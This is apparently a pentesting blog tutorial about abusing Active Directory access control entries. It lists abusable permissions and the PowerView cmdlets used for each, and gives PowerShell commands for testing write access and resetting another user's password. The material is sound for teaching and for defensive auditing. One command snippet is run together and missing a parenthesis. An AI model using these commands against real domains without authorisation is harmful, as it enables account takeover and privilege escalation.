...
Write
OneWriteup
  • Login
  • Register
  • Trending
  • Articles
  • Blog
  • Tutorials
  • News
  • Research
  • Top 10 Lists
  • Case Studies
  • Writeup
  • Interviews
  • Personal Stories
  • Infographics
No Result
View All Result
  • Trending
  • Articles
  • Blog
  • Tutorials
  • News
  • Research
  • Top 10 Lists
  • Case Studies
  • Writeup
  • Interviews
  • Personal Stories
  • Infographics
No Result
View All Result
OneWriteup
No Result
View All Result

What is Access Control List (ACL) and How to exploit it in Active Directory?

FOUNDER by FOUNDER
October 13, 2024
Reading Time: 6 mins read
21
1
What is Access Control List (ACL) and How to exploit it in Active Directory?
Share on FacebookShare on Twitter

Active Directory ACL

When we talk about ACL-based attacks, we are specifically referring to Access Control Entries (ACEs) which populate Discretionary Access Control Lists (DACLs). DACLs reside within security descriptors, which reside within securable objects. Active Directory users, groups, and computers are securable objects. Access Control Entries describe the allowed and denied permissions for other principals in Active Directory against the securable object.

What is Access Control List (ACL) and How to exploit it in Active Directory?
Above: The graphical representation of the security descriptor for the user “Jeff Dimmock”. Highlighted in red is the Discretionary Access Control List (DACL), comprised of Access Control Entries (ACEs).

The best example of this is when one object has “full control” over another object. Consider the “Domain Admins” group, for example. It makes sense that the “Domain Admins” group would have full control over every other object in a domain:


Above: The ACE granting the “Domain Admins” group full control of the “Jeff Dimmock” user is highlighted in red.

Now, of course, the Domain Admins group has full control of every other object in Active Directory; however, as attackers, we are interested in how we can abuse ACEs to gain control of a domain admin or a user or group that gets us closer to our target objective. Additionally, the owner of an object has complete control (GenericAll equivalent) of the object, regardless of any explicit deny ACEs.

Common ACEs Abused in Active Directory

  • ForceChangePassword: The ability to change the target user’s password without knowing the current value. Abused with Set-DomainUserPassword.
  • AddMembers: The ability to add arbitrary users, groups, or computers to the target group. Abused with Add-DomainGroupMember.
  • GenericAll: Full object control, including the ability to add other principals to a group, change a user password without knowing its current value, register an SPN with a user object, etc. Abused with Set-DomainUserPassword or Add-DomainGroupMember.
  • GenericWrite: The ability to update any non-protected target object parameter value. For example, update the “scriptPath” parameter value on a target user object to cause that user to run your specified executable/commands the next time that user logs on. Abused with Set-DomainObject.
  • WriteOwner: The ability to update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. Abused with Set-DomainObjectOwner.
  • WriteDACL: The ability to write a new ACE to the target object’s DACL. For example, an attacker may write a new ACE to the target object DACL giving the attacker “full control” of the target object. Abused with Add-NewADObjectAccessControlEntry.
  • AllExtendedRights: The ability to perform any action associated with extended Active Directory rights against the object. For example, adding principals to a group and force changing a target user’s password are both examples of extended rights. Abused with Set-DomainUserPassword or Add-DomainGroupMember.
  • Self (Self-Membership): Ability to add yourself to a group!

How to Grant GenericAll Permission to a User?

To grant GenericAll permission to a user in Active Directory (AD), follow these steps:

  1. Open the Active Directory Users and Computers (ADUC) console.
  2. Navigate to the user account that you want to grant full permission to.
  3. Right-click on the user account and select “Properties”.
  4. In the properties window, go to the “Security” tab.
  5. Click on the “Advanced” button.
  6. In the “Advanced Security Settings” window, click on the “Add” button.
  7. In the “Permission Entry” window, click on “Select a principal”, then click “Advanced”, and finally “Find Now”.
  8. In the “Search” window, find and select the user or group that you want to grant full permission to.
  9. Click “OK” to close the “Search” window.
  10. In the “Permission Entry” window, select “This object and all descendant objects” in the “Applies to” dropdown.
  11. In the “Permissions” section, select “Full control” for the “Allow” permission.
  12. Click “OK” to close the “Permission Entry” window.
  13. Click “OK” to close the “Advanced Security Settings” window.
  14. Click “OK” to close the “Properties” window.

Now, the user or group should have full control permission on the selected user account and all descendant objects in Active Directory.

Note: Use caution when granting this kind of permission and only give it to trusted users or groups.


How to Check if a User Has GenericAll Permissions (using Bloodhound)

  1. Gather the data using SharpHound and open it in BloodHound.
  2. Search for the user whose permission you want to check.
  3. Click on the user, and from the Node Info menu, click on Transitive Object Control.
    What is Access Control List (ACL) and How to exploit it in Active Directory?
  4. If the user has GenericAll access over another user, it will be displayed.

In the example below, Lindi.Bryn has GenericAll access over Etta.Dona:

 

 


Installing the Active Directory PowerShell Module

The Active Directory module for Windows PowerShell is not installed by default on most systems. It is part of the Remote Server Administration Tools (RSAT) package, which can be installed on Windows client operating systems to manage Windows Server roles and features remotely.

To install RSAT and the Active Directory module, use the following commands:

Add-WindowsFeature RSAT-AD-PowerShell

Or:

Get-WindowsCapability -Name RSAT.ActiveDirectory* -Online | Add-WindowsCapability -Online


Check if You Have GenericAll or Write Permissions on a User

After importing the Active Directory module in PowerShell, use the following command to test if you can modify a user object:

Import-Module ActiveDirectorySet-ADUser -Identity Etta.Dona -Description "Test update"

This command attempts to update the description for the user Etta.Dona. If you don’t have sufficient permissions, the command will fail.


Change the Password of Another User if You Have GenericAll/Write Permission

To change the password of another user in Active Directory (if you have sufficient permissions), use the following PowerShell command:

Set-ADAccountPassword -Identity 'username' -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "NewPassword" -Force

If you want to read about Kerberoasting attack here is the article.

Understanding Kerberoasting: Creation, Exploitation, Impact, and Defense

ADVERTISEMENT
ADVERTISEMENT
FOUNDER

FOUNDER

Cybersecurity aficionado committed to disseminating expertise, crafting articles that empower others to resolve errors and fortify online defenses with ease.

Recently Posted

HOW To BECOME AN ETHICAL HACKER ROADMAP

Free Cybersecurity Roadmap for Ethical Hacking Career in 2025

November 15, 2024
699
Top 4 Cyber attacks Commonly used for Hacking Websites!

Top 4 Cyber attacks Commonly used for Hacking Websites!

November 9, 2024
161
How to use bloodhound tool for pentesting

How to use Bloodhound / Sharphound for Pentesting Active Directory?

November 6, 2024
444
Pass The Hash

How to perform Pass The Hash Attack on Active Directory in 2024?

November 2, 2024
146
Load More

Comments 1

  1. Pingback: What is As-Rep Roasting attack in Active Directory and How does it work? - OneWriteup

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

ADVERTISEMENT

Recommended

Have I Been Pwned? Smile you’re under Hacker’s Ruthless Oversight!!!

Have I Been Pwned? Smile you’re under Hacker’s Ruthless Oversight!!!

August 24, 2024
125
How to remove Private Leaked Photo or Video from internet.

7 Steps To Remove Leaked Private Photos or Videos from the Internet.

September 27, 2024
300

Popular Story

  • Download the Top 100 Free Cybersecurity Courses, Resources, and Study Materials for 2024

    Download the Top 100 Free Cybersecurity Courses, Resources, and Study Materials for 2024

    720 shares
    Share 288 Tweet 180
  • Termux Top 10 Most Powerful Tools in 2024

    263 shares
    Share 105 Tweet 66
  • How to use Bloodhound / Sharphound for Pentesting Active Directory?

    80 shares
    Share 32 Tweet 20
  • OSCP vs OSCP+: What New Changes Have Been Made?

    100 shares
    Share 40 Tweet 25
  • What is Access Control List (ACL) and How to exploit it in Active Directory?

    31 shares
    Share 12 Tweet 8
ADVERTISEMENT
OneWriteup

Discover expert cybersecurity articles, tutorials, and the latest trends to protect your digital world.

  • OneWriteup Labs
  • About Us
  • Feedback
  • Contact Us
  • Report
  • Privacy Policy
  • Community Guidelines
  • Terms Of Service

© 2024 OneWriteup

No Result
View All Result
  • Trending
  • Articles
  • News
  • Blog
  • Tutorials
  • Research
  • Top 10 Lists
  • Case Studies
  • Interviews
  • Login
  • Sign Up

© 2024 OneWriteup

Welcome Back!

Login to your account below

Forgotten Password? Sign Up

Create New Account!

Fill the forms below to register

All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In
Seraphinite AcceleratorOptimized by Seraphinite Accelerator
Turns on site high speed to be attractive for people and search engines.